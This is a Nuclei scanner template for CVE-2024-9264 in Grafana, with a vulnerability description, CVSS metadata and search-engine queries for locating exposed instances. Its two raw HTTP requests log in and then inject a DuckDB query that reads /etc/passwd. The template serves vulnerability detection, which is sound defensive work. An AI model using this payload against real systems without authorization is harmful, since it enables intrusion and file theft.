The SQL Expressions experimental feature of Grafana allows for the evaluation of `duckdb` queries containing user input. These queries are insufficiently sanitized before being passed to `duckdb`, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack. The `duckdb` binary must be present in Grafana's $PATH for this attack to function; by default, this binary is not installed in Grafana distributions.
PoC代码[已公开]
id: CVE-2024-9264
info:
name: Grafana Post-Auth DuckDB - SQL Injection To File Read
author: princechaddha
severity: critical
description: |
The SQL Expressions experimental feature of Grafana allows for the evaluation of `duckdb` queries containing user input. These queries are insufficiently sanitized before being passed to `duckdb`, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack. The `duckdb` binary must be present in Grafana's $PATH for this attack to function; by default, this binary is not installed in Grafana distributions.
remediation: |
Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
reference:
- https://x.com/nol_tech/status/1847639874909749443
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-9264
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2024-9264
cwe-id: CWE-94
epss-score: 0.92233
epss-percentile: 0.99706
metadata:
max-request: 2
vendor: grafana
product: grafana
shodan-query:
- http.title:"grafana"
- cpe:"cpe:2.3:a:grafana:grafana"
fofa-query:
- app="grafana"
- title="grafana"
google-query: intitle:"grafana"
tags: cve,cve2024,grafana,sqli,lfr,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
content-type: application/json
{"user":"{{username}}","password":"{{password}}"}
matchers:
- type: word
part: header
words:
- "grafana_session"
internal: true
- raw:
- |
POST /api/ds/query?ds_type=__expr__&expression=true&requestId=Q101 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"from": "1729313027261",
"queries": [
{
"datasource": {
"name": "Expression",
"type": "__expr__",
"uid": "__expr__"
},
"expression": "SELECT content FROM read_blob('/etc/passwd')",
"hide": false,
"refId": "B",
"type": "sql",
"window": ""
}
],
"to": "1729334627261"
}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:"
- type: word
part: body
words:
- '"data":{'
# digest: 4b0a00483046022100e4228852bb2521c97e914548555c7cb1a770ca9a5c0fe621b4e928c15218cbd1022100f5788514a0a7c70ea8b03f796114bf17305ca7935ebf367aaa842b49c8278a93:922c64590222798bb761d5b6d8e72950